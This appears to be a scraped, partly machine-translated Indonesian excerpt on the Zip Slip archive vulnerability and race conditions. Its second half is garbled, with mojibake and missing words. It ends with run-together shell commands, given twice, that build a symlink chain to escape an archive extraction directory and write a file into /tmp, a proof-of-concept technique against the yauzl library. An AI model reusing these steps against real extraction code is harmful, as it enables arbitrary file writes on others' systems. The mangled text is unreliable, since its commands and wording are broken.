Zip Slip adalah kerentanan dekompresi arsip kritis luas yang memungkinkan penyerang untuk menulis file sewenang-wenang ke sistem, yang biasanya mengarah pada eksekusi perintah yang jauh. Itu ditemukan dan diungkapkan oleh tim Keamanan Snyk untuk mengantisipasi pengungkapan publik pada 5 Juni 2018 dan mempengaruhi ribuan proyek, termasuk HP, Amazon, Apache, Pivotal dan banyak lainnya.
Kondisi Lomba (catatan, Kondisi Lomba), juga kompetisi adalah kesalahan dalam merancang sistem atau aplikasi multi-ulir di mana pengoperasian sistem atau aplikasi tergantung pada urutan di mana bagian kode dijalankan.
, ยซ ยป .zip-, yauzl , ยซ..ยป., , . . , , ., , . / , . . - :mkdir generic_dirln -s ../ generic_dir/symlink_to_parent_dirln -s / symlink_to_roottouch generic_dir/symlink_to_parent_dir/generic_dir/symlink_to_parent_dir/[...]/symlink_to_root/tmp/slipped_zip.txt!
mkdir generic_dirln -s ../ generic_dir/symlink_to_parent_dirln -s / symlink_to_roottouch generic_dir/symlink_to_parent_dir/generic_dir/symlink_to_parent_dir/[...]/symlink_to_root/tmp/slipped_zip.txt